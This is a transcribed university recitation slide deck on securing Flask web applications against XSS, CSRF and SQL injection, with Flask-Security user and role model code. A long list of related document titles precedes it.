CS1520 Recitation: Security in Flask

Similar documents
Application vulnerabilities and defences

Flask-Security Documentation

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

Web Application Security. Philippe Bogaerts

CS 155 Project 2. Overview & Part A

CIS 4360 Secure Computer Systems XSS

Chrome Extension Security Architecture

EasyCrypt passes an independent security audit

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

Flask Web Development Course Catalog

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

Web Programming with Python and JavaScript

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

PHP and MySQL Programming

Your Turn to Hack the OWASP Top 10!

Flask-Migrate Documentation. Miguel Grinberg

Ruby on Rails Secure Coding Recommendations

CS 161 Computer Security

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

Web Security. Web Programming.

CSCE 813 Internet Security Case Study II: XSS

Web Security: Vulnerabilities & Attacks

CONTENTS IN DETAIL INTRODUCTION 1 THE FAQS OF LIFE THE SCRIPTS EVERY PHP PROGRAMMER WANTS (OR NEEDS) TO KNOW 1 2 CONFIGURING PHP 19

eb Security Software Studio

IERG 4210 Tutorial 07. Securing web page (I): login page and admin user authentication Shizhan Zhu

Flask-User Documentation

CSE 127 Computer Security

OWASP TOP 10. By: Ilia

Web Security: Web Application Security [continued]

CS 161 Computer Security

Solutions Business Manager Web Application Security Assessment

Web Security. Attacks on Servers 11/6/2017 1

Advanced Web Technology 10) XSS, CSRF and SQL Injection

COMP9321 Web Application Engineering

CSE 484 / CSE M 584: Computer Security and Privacy. Web Security. Autumn Tadayoshi (Yoshi) Kohno

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection

WEB SECURITY: XSS & CSRF

Web Applications Penetration Testing

CS 142 Winter Session Management. Dan Boneh

UNIVERSITY OF TARTU FACULTY OF SCIENCE AND TECHNOLOGY INSTITUTE OF COMPUTER SCIENCE INFORMATICS. CVE Hiie-Helen Raju

Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

release notes effective version 10.3 ( )

Web Security IV: Cross-Site Attacks

Web Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

SECURITY TESTING. Towards a safer web world

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

Webapps Vulnerability Report

Information Security CS 526 Topic 8

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

Automatically Checking for Session Management Vulnerabilities in Web Applications


Web Security: Loose Ends

OWASP Thailand. Proxy Caches and Web Application Security. OWASP AppSec Asia October 21, Using the Recent Google Docs 0-Day as an Example

Web basics: HTTP cookies

IronWASP (Iron Web application Advanced Security testing Platform)

Assignment 6: Web Security

Web Application Vulnerabilities: OWASP Top 10 Revisited

CSCE 548 Building Secure Software SQL Injection Attack

WHY CSRF WORKS. Implicit authentication by Web browsers

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

Web Security. Thierry Sans

Application Design and Development: October 30

CHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS

I n p u t. This time. Security. Software. sanitization ); drop table slides. Continuing with. Getting insane with. New attacks and countermeasures:

COMP9321 Web Application Engineering

Solution of Exercise Sheet 5

1 About Web Security. What is application security? So what can happen? see [?]

NET 311 INFORMATION SECURITY

P2_L12 Web Security Page 1

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

EPRI Software Development 2016 Guide for Testing Your Software. Software Quality Assurance (SQA)

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

Web Application Attacks

Sichere Software vom Java-Entwickler

Web Application Security

Web Attacks CMSC 414. September 25 & 27, 2017

CSCD 303 Essential Computer Security Fall 2017

Aguascalientes Local Chapter. Kickoff

Avoiding Web Application Flaws In Embedded Devices. Jake Edge LWN.net URL for slides:

Web Services Configuration Guide

Contents. xvii xix xxiil. xxvii

Web Security II. Slides from M. Hicks, University of Maryland

Information Security CS 526 Topic 11

Oracle Application Express 5 New Features

Lecture 6: Web Security CS /17/2017

Project 2: Web Security

Web Security Computer Security Peter Reiher December 9, 2014

An analysis of security in a web application development process

Client Portal FAQ's. Client Portal FAQ's. Why is the Portal more secure?

Web Application Penetration Testing

INF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015

WELCOME. APEX Security Primer. About Enkitec. About the Presenter. ! Oracle Platinum Partner! Established in 2004

Assessment 1 Task 3 Explain the following security risks SQL Injection Cross Site Scripting XSS Brute Force Attack/Dictionary Attack

Web Application Threats and Remediation. Terry Labach, IST Security Team

Application Layer Security

Transcription:

CS1520 Recitation: Security in Flask Jeongmin Lee Slide contents based on a post by Damyan Bogoev at: https://damyanon.net/post/flask-series-security/

Plan for Today XSS (Cross Site Scripting) CSRF (Cross-Site Request Forgery) SQL Injection Authentication and Authorization

Plan for Today XSS CSRF SQL Injection Authentication and Authorization

XSS Cross Site Scripting (XSS) Attack that tries to have your websites or applications load malicious script in your browser

XSS Cross Site Scripting (XSS) Attack that tries to have your websites or applications load malicious script in your browser Try access user s credentials, get cookie info, modify settings and download files etc.

XSS Cross Site Scripting (XSS) Attack that tries to have your websites or applications load malicious script in your browser Try access user s credentials, get cookie info, modify settings and download files etc. Can avoided by escaping text and validating user input.

XSS In Flask, by default it configures Jinja2 to auto escape all values loaded in the page. http://jinja.pocoo.org/docs/dev/extensions/#autoescap e-extension)

XSS More considerations for securing your applications w.r.t XSS: avoid generating html without Jinja2

XSS More considerations for securing your applications w.r.t XSS: avoid generating html without Jinja2 avoid sending out data from uploaded files

XSS More considerations for securing your applications w.r.t XSS: avoid generating html without Jinja2 avoid sending out data from uploaded files avoid using the Markup class on not verified data sent by a user

XSS More considerations for securing your applications w.r.t XSS: avoid generating html without Jinja2 avoid sending out data from uploaded files avoid using the Markup class on not verified data sent by a user always quote the attributes values in your templates.

Plan for Today XSS CSRF SQL Injection Authentication and Authorization

CSRF Cross-Site Request Forgery (CSRF) is an attack that uses the user s authentication credentials to execute unwanted actions. To against CSRF, you can use random string and to verify it against a hidden field in post.

CSRF source: http://flask.pocoo.org/snippets/3/

CSRF Put this in your template: source: http://flask.pocoo.org/snippets/3/

Plan for Today XSS CSRF SQL Injection Authentication and Authorization

SQL Injection SQL Injection is an attack where users can inject SQL commands via user input form and have them executed on the server.

SQL Injection SQL Injection is an attack where users can inject SQL commands via user input form and have them executed on the server. This SQL query can be anything and can be very harmful.

SQL Injection SQL Injection is an attack where users can inject SQL commands via user input form and have them executed on the server. This SQL query can be anything and can be very harmful. Your application can be exposed to this attack when you dynamically create SQL statements. e.g., concatenating data based on user s input

SQL Injection By default SQL Alchemy quotes special characters semicolons or apostrophes.

Plan for Today XSS CSRF SQL Injection Authentication and Authorization

Authentication and Authorization Authentication verifies the user s identity by validating his/her credential (username / email, password) Authorization verifies whether authenticated user has access to a given resource

Flask-Security Flask-Security uses internally a User and Role data model, that could be defined via the SQL Alchemy API. You can inherit Flask-Security s User and Role MixIn class to build your own.

roles_users = db.table('roles_users', \ db.column('user_id', db.integer(), db.foreignkey('user.id')), \ db.column('role_id', db.integer(), db.foreignkey('role.id'))) class Role(db.Model, RoleMixin): id = db.column(db.integer(), primary_key=true) name = db.column(db.string(80), unique=true) description = db.column(db.string(255)) def init (self, name): self.name = name source: https://damyanon.net/post/flask-series-security/

class User(db.Model, UserMixin): id = db.column(db.integer, primary_key=true) email = db.column(db.string(255), unique=true) password = db.column(db.string(255)) active = db.column(db.boolean()) roles = db.relationship('role', secondary=roles_users, backref=db.backref('users', lazy='dynamic')) def init (self, email, password, active, roles): self.email = email self.password = password self.active = active self.roles = roles source: https://damyanon.net/post/flask-series-security/

Flask-Security The User class derives from UserMixin Flask-Login default user implementation. Same for Role class. SQL Alchemy is used for both User and Role objects. Following configurations is added to use Flask-Login with SQL Alchemy

def configure_app(app):... # Configure Security user_datastore = SQLAlchemyUserDatastore(db, User, Role) app.security = Security(app, user_datastore)... Complete explanation of Flask-Security configuration is here: https://pythonhosted.org/flask-security/configuration.html source: https://damyanon.net/post/flask-series-security/

Questions?

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback